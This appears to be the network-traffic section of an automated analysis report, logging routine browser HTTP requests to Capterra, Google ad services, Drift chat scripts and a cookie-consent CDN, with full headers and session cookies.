Source: global traffic HTTP traffic detected: GET /ddm/fls/z/dc_pre=CI_uo9mOnYgDFU1OpAQdGH4MHw;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=*;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F HTTP/1.1Host: adservice.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://8036043.fls.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /pagead/1p-user-list/1072635088/?random=1725034607177&cv=11&fst=1725033600000&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&hn=www.googleadservices.com&frm=0&tiba=Publicate%20Pricing%2C%20Alternatives%20%26%20More%202024%20%7C%20Capterra&npa=0&pscdl=noapi&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDpaXnfreFr7UMJUwrxjcQQl0sATJa54prevAhrBa7LzEOEJMNWOgdD&random=2594997369&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/43.7ac85d58.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /scripttemplates/202403.2.0/assets/otCenterRounded.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.capterra.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /scripttemplates/202403.2.0/assets/otCommonStyles.css HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.capterra.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /consent/989b7b21-d05b-49b3-9b8a-3dbec459287a/018fce69-2081-771f-b4c1-f49c8e55a112/en.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/50.de3b5864.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/11.639238ba.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /search HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034608.59.0.0
Source: global traffic HTTP traffic detected: GET /core/assets/js/20.8c21ea18.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/42.f634da7c.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/29.31d09948.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/21.b8c41db9.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/26.04e7f30b.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/8.3f6aefd1.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/16.d215b579.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/14.e24a6190.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/18.9c1bd1fb.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /search/ HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034611.56.0.0; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1
Source: global traffic HTTP traffic detected: GET /ddm/fls/z/dc_pre=CI_uo9mOnYgDFU1OpAQdGH4MHw;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=*;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F HTTP/1.1Host: adservice.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /scripttemplates/202403.2.0/assets/otCenterRounded.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /scripttemplates/202403.2.0/assets/otCommonStyles.css HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/42.f634da7c.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/24.f9f5e493.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/21.b8c41db9.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/29.31d09948.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/17.17dea2aa.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/50.de3b5864.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/8.3f6aefd1.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/16.d215b579.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/css/538d90e86755aff1.css HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/css/d1857e6f465dd807.css HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
